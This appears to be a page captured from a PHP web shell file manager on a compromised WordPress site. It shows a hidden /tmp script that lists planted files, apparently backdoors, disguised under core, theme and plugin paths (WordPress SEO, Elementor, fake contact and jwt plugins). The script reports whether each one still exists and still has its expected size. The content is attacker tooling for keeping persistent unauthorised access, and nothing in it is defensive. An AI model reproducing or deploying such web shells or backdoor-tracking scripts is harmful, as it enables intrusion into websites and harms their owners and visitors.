D7net
Home
Console
Upload
information
Create File
Create Folder
About
Tools
:
/
proc
/
self
/
root
/
proc
/
self
/
root
/
proc
/
thread-self
/
root
/
tmp
/
Filename :
.element
back
Copy
<?php $r = '/home/vblioqus/public_html'; $x = ["/wp-includes/class-wp-locale.php"=>"bd@@254756@@17", "/wp-content/plugins/wordpress-seo/inc/class-wpseo-admin-bar-menu.php"=>"bd@@254757@@81", "/wp-includes/functions.wp-scripts.php"=>"bd@@254763@@87", "/wp-content/plugins/jwt-txt/AdaptiveEventScheduler.php"=>"bd@@254764@@89", "/wp-admin/ms-delete-site.php"=>"bd@@254765@@11", "/wp-content/plugins/contact-1766697603/assets/js/pcltar.lib.php"=>"bd@@254618@@926", "/wp-content/themes/hello-elementor/vendor/elementor/wp-notifications-package/src/V120/compose.php"=>"bd@@234927@@899", "/wp-content/plugins/wordpress-seo/src/dashboard/application/score-groups/seo-score-groups/seo.score.groups.repository.php"=>"bd@@254766@@875", "/wp-content/plugins/elementor/data/v2/base/endpoint/index/all.children.php"=>"bd@@254767@@857", "/wp-content/plugins/wordpress-seo/vendor_prefixed/psr/http-client/src/mcrypt.lib.php"=>"bd@@254768@@902", "/wp-content/plugins/wordpress-seo/src/dashboard/infrastructure/connection/site.kit.is.connected.call.php"=>"bd@@254769@@964", "/wp-content/plugins/contact-1766697603/assets/js/custom_file_5_1766697604.php"=>"bd@@39022@@874", "/wp-content/plugins/wordpress-seo/src/dashboard/application/search-rankings/top.page.repository.php"=>"bd@@254770@@856"]; foreach ($x as $p => $l) { $f = "{$r}{$p}"; list($t, $id, $pt) = explode('@@', $l); if (!file_exists($f)) { print "<$t>{$id}##d</$t>\n"; continue; } if (is_numeric($pt)) { $fs = filesize($f); if ($fs != $pt) { print "<$t>{$id}##bs</$t>\n"; } } else { $c = file_get_contents($f); if (!strstr($c, $pt)) { print "<$t>{$id}##d</$t>\n"; } } } die('!end!');